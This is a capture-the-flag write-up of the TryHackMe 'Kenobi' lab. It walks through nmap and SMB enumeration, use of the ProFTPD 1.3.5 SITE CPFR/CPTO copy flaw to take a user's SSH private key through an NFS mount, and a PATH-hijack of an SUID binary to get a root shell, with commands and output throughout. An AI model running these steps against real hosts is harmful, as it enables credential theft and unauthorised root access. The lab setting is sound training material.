THM — Kenobi Writeup
https://tryhackme.com/room/kenobi
Deploy the vulnerable machine
Nmap Scan: $nmap -T4 -A 10.10.88.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 01:36 EST
Nmap scan report for 10.10.88.100
Host is up (0.36s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 52145/tcp6 mountd
| 100005 1,2,3 52209/udp6 mountd
| 100005 1,2,3 53083/tcp mountd
| 100005 1,2,3 60946/udp mountd
| 100021 1,3,4 34275/tcp nlockmgr
| 100021 1,3,4 36852/udp nlockmgr
| 100021 1,3,4 40952/udp6 nlockmgr
| 100021 1,3,4 43819/tcp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h27m51s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2020-11-11T00:37:33-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-11T06:37:33
|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.83 seconds
Scan the machine with nmap, how many ports are open?
Ans: 7
Enumerating Samba for shares
Enumerating shares with nmap:
nmap -p 445 — script=smb-enum-shares.nse,smb-enum-users.nse 10.10.88.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 01:45 EST
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 50.00% done; ETC: 01:46 (0:00:21 remaining)
Nmap scan report for 10.10.88.100
Host is up (0.36s latency).PORT STATE SERVICE
445/tcp open microsoft-dsHost script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.88.100\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.88.100\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.88.100\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)Nmap done: 1 IP address (1 host up) scanned in 53.50 seconds
Using the nmap command above, how many shares have been found?
Ans: 3
Next, inspect the anonymous share using the command:
smbclient //10.10.88.100/anonymousWhen asked to input a password, just hit enter without entering any password.
Input help to list out what commands to use for SMB.
kali@kali:~$ smbclient //10.10.88.100/anonymous
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!Once you’re connected, list the files on the share. What is the file can you see?
List out the files on the share using the command: $ ls
smb: \> ls
. D 0 Wed Sep 4 06:49:09 2019
.. D 0 Wed Sep 4 06:56:07 2019
log.txt N 12237 Wed Sep 4 06:49:09 20199204224 blocks of size 1024. 6877104 blocks available
Ans: log.txt
Using the command: $ get log.txt
You can download the file to your local machine and view it.
What port is FTP running on?
Ans: 21
Next, let’s enumerate port 111: nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.88.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 02:09 EST
Nmap scan report for 10.10.88.100
Host is up (0.36s latency).PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *Nmap done: 1 IP address (1 host up) scanned in 3.28 seconds
What mount can we see?
Ans:/var
Gain initial access with ProFtpd
Using netcat to connect to the machine on the FTP port, where FTP is port 21: $ nc 10.10.88.100 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.88.100]What is the version?
Ans: 1.3.5
Use searchsploit to search for exploits.
How many exploits are there for the ProFTPd running?
Ans:3
From the log.txt file earlier we can see that the FTP server is running as the kenobi user.
In the log.txt it is mentioned where the user’s id_rsa key is located:
“Your identification has been saved in /home/kenobi/.ssh/id_rsa”
Based on the exploit we found earlier: “File copy — 36742.txt”.
We can use the command: SITE CPFR to state the source file/directory and the command: SITE CPTO to state the destination file/directory.
This will copy the file from the source to the destination.
Here we will perform the commands to set the location of the id_rsa file:
$ site cpfr /home/kenobi/.ssh/id_rsaPreviously we enumerated port 111, and found out that we could see the /var directory.
Next, we will set the destination file using the commands:
$ site cpto /var/tmp/id_rsaThis way we have moved the id_rsa key from the /home/kenobi/ to /var/tmp/ directory.
*My THM box IP expired, the new IP address is: 10.10.93.173
kali@kali:~$ nc 10.10.93.173 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.93.173]
site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site cpto /var/tmp/id_rsa
250 Copy successfulNext, we will need to mount the /var/tmp directory to our machine.
kali@kali:~$ sudo mkdir /mnt/kenobiNFSkali@kali:~$ sudo mount 10.10.93.173:/var /mnt/kenobiNFSkali@kali:~$ ls -la /mnt/kenobiNFS/
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Nov 11 02:54 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 29 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Nov 11 02:51 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
We have successfully network mount the /var into our machine.
Let’s check the RSA key out.
Using the command: $ cp /mnt/kenobiNFS/tmp/id_rsa .
I am able to copy the RSA key into my current kali directory.
Remember to chmod 600 id_rsa before using the key. If not you will get prompted that the RSA key permissions are too open.
Now, with this RSA key, we can ssh into kenobi’s account using the command:
$ ssh -i id_rsa kenobi@10.10.93.173Nice, now we have successfully ssh over to kenobi user account.
Let’s find the user flag.
kenobi@kenobi:~$ pwd
/home/kenobi
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899What is Kenobi’s user flag (/home/kenobi/user.txt)?
Ans: d0b0f3f53b6caa532a83915e19224899
Privilege Escalation with Path Variable Manipulation
With the following command we can search the system for files with SUID bits:
find / -perm -u=s -type f 2>/dev/null
What file looks particularly out of the ordinary?
Ans: /usr/bin/menu
Let’s run this binary.
Run the binary, how many options appear?
Ans: 3
Entering each choice executes some commands.
Using the command: $ strings /usr/bin/menu
We can print out human-readable strings.
After the sentence “Enter your choice: ” we can see the following commands:
curl -I localhost
uname -r
ifconfigBasically if we run each commands, it is the same as before when we enter our choice of 1–3.
Note above that the binaries are running without a full path.
Example of full path: /usr/bin/curl
We can manipulate the path to gain a root shell.
First, we create a /bin/bash string into a file named curl.
We changed the permissions of the file curl.
We exported the /tmp directory into the $PATH environmental variable
If we take a look at the $PATH environmental variable now:
kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binSo what these all means?
Previously if you echo, the /tmp directory would not be there, but we used the command$ export PATH=/tmp:$PATH and add the /tmp directory to the front of all the other directories.
Whenever we use a command for example: $ pwd, $ ls, $ cat, the Shell will look into the $PATH environmental variable which contains a list of directories paths separated by a colon (shown above).
It will look through each directory paths in the order from left to right (first it ill search in the /tmp, then the /home/kenobi/bin, then the /home/kenobi/.local/bin and so on) to find and run the binary or executable file, that has the name of the command that you input or entered in the command line.
You can use the command: $ which to show the location of the binaries or executables.
kali@kali:~$ which pwd
/usr/bin/pwd
kali@kali:~$ which ls
/usr/bin/ls
kali@kali:~$ which cat
/usr/bin/catSo when we run $ /usr/bin/menu and enter the choice of “1” now. It will run the curl command. Remember previously we use the command: $ strings /usr/bin/menu to find out that by entering choice “1” we are executing the command: $ curl -I localhost .
Now, the shell will look into the $PATH variable to find the fake curl binary. It will first look into the /tmp directory since that is the first directory to look at. Then it will find the fake curl binary and execute it and with the /usr/bin/menu running as root, we got our shell.
For own better understanding, I run the command: $ /bin/sh on my own machine.
kali@kali:/$ /bin/sh
$ pwd
/
$ whoami
kali
$ exitBasically, when I run it, it opens a system shell. But, the current user is still my default “kali” user.
Run the same command with sudo: $ sudo /bin/sh
kali@kali:/$ sudo /bin/sh
[sudo] password for kali:
# pwd
/
# whoami
root
# exit
kali@kali:/$This time by running it with sudo, it will open a shell but as a root user.
The same thing as what we are going to do below. Since the /usr/bin/menu has a SUID bit, meaning it will run the command as root. Next, by entering choice “1” we are trying to run the curl command, which the shell will look into the $PATH variable and find the fake curl that we created. So essentially we are executing the /bin/sh that is found in the fake curl file as root and got the root shell.
What is the root flag (/root/root.txt)?
Ans: 177…
You can learn more about the $PATH environmental variable here.
